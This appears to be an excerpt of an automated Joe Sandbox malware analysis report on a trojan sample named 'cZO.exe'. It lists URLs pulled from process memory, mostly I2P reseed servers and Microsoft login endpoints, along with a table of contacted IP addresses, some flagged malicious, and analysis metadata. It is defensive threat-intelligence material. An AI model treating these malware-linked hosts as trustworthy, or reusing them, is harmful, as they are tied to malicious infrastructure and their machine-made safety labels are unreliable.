                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://Passport.NET/STSsvchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://reseed-pl.i2pd.xyz:443/i2pseeds.su3Tmain.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://reseed-pl.i2pd.xyz/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://stats.i2p/cgi-bin/newhosts.txtshdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://127.0.0.1:8118shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://reseed.onion.im/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://i2p.mooo.com/netDb/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://reseed2.i2p.net/main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://Passport.NET/tbsvchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://reseed.stormycloud.org/??main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reseed.i2pgit.org/i2pseeds.su30main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://signup.live.com/signup.aspxsvchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reseed.stormycloud.org/7main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reseed.i2p-projekt.de/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://netdb.i2p2.no/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www2.mk16.de/Jmain.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://reseed-pl.i2pd.xyz/i2pseeds.su3main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://reg.i2p/hosts.txt9main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://legit-website.com/i2pseeds.su3shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://i2p.ghativega.in/b.cmain.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  87.209.87.178
                                                                                                                  		unknownNetherlands
                                                                                                                  		13127VERSATELASfortheTrans-EuropeanTele2IPTransportbackbofalse
                                                                                                                  147.79.71.139
                                                                                                                  		unknownUnited States
                                                                                                                  		208485EKSENBILISIMTRfalse
                                                                                                                  24.57.10.130
                                                                                                                  		unknownCanada
                                                                                                                  		7992COGECOWAVECAfalse
                                                                                                                  31.3.152.100
                                                                                                                  		unknownSweden
                                                                                                                  		51430ALTUSNLfalse
                                                                                                                  155.93.133.82
                                                                                                                  		unknownSouth Africa
                                                                                                                  		37680COOL-IDEASZAfalse
                                                                                                                  107.189.28.6
                                                                                                                  		unknownUnited States
                                                                                                                  		53667PONYNETUStrue
                                                                                                                  23.137.249.66
                                                                                                                  		unknownReserved
                                                                                                                  		397614GTLAKESUSfalse
                                                                                                                  95.216.2.172
                                                                                                                  		reseed.memcpy.ioGermany
                                                                                                                  		24940HETZNER-ASDEtrue
                                                                                                                  36.37.69.163
                                                                                                                  		unknownIndonesia
                                                                                                                  		4800LINTASARTA-AS-APNetworkAccessProviderandInternetServicfalse
                                                                                                                  139.59.231.96
                                                                                                                  		unknownSingapore
                                                                                                                  		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                  144.76.102.56
                                                                                                                  		unknownGermany
                                                                                                                  		24940HETZNER-ASDEfalse
                                                                                                                  123.215.14.113
                                                                                                                  		unknownKorea Republic of
                                                                                                                  		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                  78.191.208.199
                                                                                                                  		unknownTurkey
                                                                                                                  		9121TTNETTRtrue
                                                                                                                  118.136.159.58
                                                                                                                  		unknownIndonesia
                                                                                                                  		23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
                                                                                                                  47.221.95.89
                                                                                                                  		unknownUnited States
                                                                                                                  		19108SUDDENLINK-COMMUNICATIONSUSfalse
                                                                                                                  148.135.95.231
                                                                                                                  		unknownSweden
                                                                                                                  		158ERI-ASUSfalse
                                                                                                                  78.57.19.55
                                                                                                                  		unknownLithuania
                                                                                                                  		8764TELIA-LIETUVALTfalse
                                                                                                                  185.148.3.164
                                                                                                                  		unknownFinland
                                                                                                                  		203003MAGNA-CAPAXFIfalse
                                                                                                                  188.174.152.142
                                                                                                                  		unknownGermany
                                                                                                                  		8767MNET-ASGermanyDEfalse
                                                                                                                  194.54.156.174
                                                                                                                  		unknownUkraine
                                                                                                                  		8654CRIMEAINFOCOM-ASUAfalse
                                                                                                                  77.238.244.54
                                                                                                                  		unknownRussian Federation
                                                                                                                  		42429TELERU-ASRUfalse
                                                                                                                  120.24.253.140
                                                                                                                  		unknownChina
                                                                                                                  		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  84.52.93.26
                                                                                                                  		unknownRussian Federation
                                                                                                                  		25408WESTCALL-SPB-ASRUfalse
                                                                                                                  24.125.49.216
                                                                                                                  		unknownUnited States
                                                                                                                  		7922COMCAST-7922USfalse
                                                                                                                  2.155.132.51
                                                                                                                  		unknownSpain
                                                                                                                  		12430VODAFONE_ESESfalse
                                                                                                                  179.254.168.215
                                                                                                                  		unknownBrazil
                                                                                                                  		8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                                                                                                  45.200.148.158
                                                                                                                  		unknownSeychelles
                                                                                                                  		328608Africa-on-Cloud-ASZAfalse
                                                                                                                  92.39.210.213
                                                                                                                  		unknownRussian Federation
                                                                                                                  		39001MTSRUfalse
                                                                                                                  145.220.60.21
                                                                                                                  		unknownNetherlands
                                                                                                                  		1101IP-EEND-ASIP-EENDBVNLfalse
                                                                                                                  101.191.73.121
                                                                                                                  		unknownAustralia
                                                                                                                  		1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                                                                                  65.109.174.146
                                                                                                                  		unknownUnited States
                                                                                                                  		11022ALABANZA-BALTUSfalse
                                                                                                                  49.176.22.233
                                                                                                                  		unknownAustralia
                                                                                                                  		4804MPX-ASMicroplexPTYLTDAUfalse
                                                                                                                  50.37.113.212
                                                                                                                  		unknownUnited States
                                                                                                                  		27017ZIPLY-FIBER-LEGACY-ASNUSfalse
                                                                                                                  57.128.196.4
                                                                                                                  		unknownBelgium
                                                                                                                  		2686ATGS-MMD-ASUSfalse
                                                                                                                  95.158.36.98
                                                                                                                  		unknownUkraine
                                                                                                                  		35362BESTBestISPUAtrue
                                                                                                                  31.10.150.55
                                                                                                                  		unknownSwitzerland
                                                                                                                  		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                                                                                  73.110.171.77
                                                                                                                  		unknownUnited States
                                                                                                                  		7922COMCAST-7922USfalse
                                                                                                                  95.105.66.5
                                                                                                                  		unknownRussian Federation
                                                                                                                  		57128KGS-NETRUfalse
                                                                                                                  72.11.42.34
                                                                                                                  		unknownUnited States
                                                                                                                  		22709NSTELCOUSfalse
                                                                                                                  82.65.181.52
                                                                                                                  		unknownFrance
                                                                                                                  		12322PROXADFRfalse
                                                                                                                  71.246.18.247
                                                                                                                  		unknownUnited States
                                                                                                                  		701UUNETUSfalse
                                                                                                                  78.58.40.197
                                                                                                                  		unknownLithuania
                                                                                                                  		8764TELIA-LIETUVALTfalse
                                                                                                                  176.241.49.148
                                                                                                                  		unknownHungary
                                                                                                                  		20845DIGICABLEHUfalse
                                                                                                                  45.83.104.162
                                                                                                                  		unknownGermany
                                                                                                                  		197540NETCUP-ASnetcupGmbHDEfalse
                                                                                                                  67.2.9.136
                                                                                                                  		unknownUnited States
                                                                                                                  		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                                                  208.113.128.162
                                                                                                                  		unknownUnited States
                                                                                                                  		26347DREAMHOST-ASUSfalse
                                                                                                                  128.140.43.40
                                                                                                                  		unknownGermany
                                                                                                                  		24940HETZNER-ASDEfalse
                                                                                                                  108.61.189.74
                                                                                                                  		unknownUnited States
                                                                                                                  		20473AS-CHOOPAUSfalse
                                                                                                                  193.233.193.76
                                                                                                                  		unknownRussian Federation
                                                                                                                  		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                  198.74.48.115
                                                                                                                  		unknownUnited States
                                                                                                                  		63949LINODE-APLinodeLLCUSfalse
                                                                                                                  120.77.100.135
                                                                                                                  		unknownChina
                                                                                                                  		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  174.164.200.204
                                                                                                                  		unknownUnited States
                                                                                                                  		7922COMCAST-7922USfalse
                                                                                                                  68.183.196.133
                                                                                                                  		reseed.i2pgit.orgUnited States
                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                  46.142.175.43
                                                                                                                  		unknownGermany
                                                                                                                  		8881VERSATELDEfalse
                                                                                                                  69.10.220.235
                                                                                                                  		unknownUnited States
                                                                                                                  		20394MASHELL-TELECOMUStrue
                                                                                                                  213.108.251.66
                                                                                                                  		unknownRussian Federation
                                                                                                                  		49834BESTHOSTINGRUfalse
                                                                                                                  178.175.134.3
                                                                                                                  		unknownMoldova Republic of
                                                                                                                  		43289TRABIAMDfalse
                                                                                                                  185.226.181.238
                                                                                                                  		reseed-pl.i2pd.xyzSpain
                                                                                                                  		197518RACKMARKTEStrue

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1584500
                                                                                                                  Start date and time:2025-01-05 17:48:06 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 9m 26s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:cZO.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.evad.winEXE@46/72@4/59
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 52.165.164.15, 40.126.32.74, 20.190.160.17, 40.126.32.133, 40.126.32.136, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.76, 20.189.173.21, 13.107.246.45
                                                                                                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                  • Execution Graph export aborted for target cZO.exe, PID 7128 because there are no executed function
                                                                                                                  • Execution Graph export aborted for target shdpeqdz2a54sj46ur0.exe, PID 7088 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  11:48:57API Interceptor155x Sleep call for process: cZO.exe modified
                                                                                                                  11:48:59API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                  11:50:15API Interceptor5149x Sleep call for process: main.exe modified
                                                                                                                  11:50:48API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  23.137.249.66file.exeGet hashmaliciousUnknownBrowse
                                                                                                                    95.216.2.172file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      194.54.156.174DF2.exeGet hashmaliciousUnknownBrowse
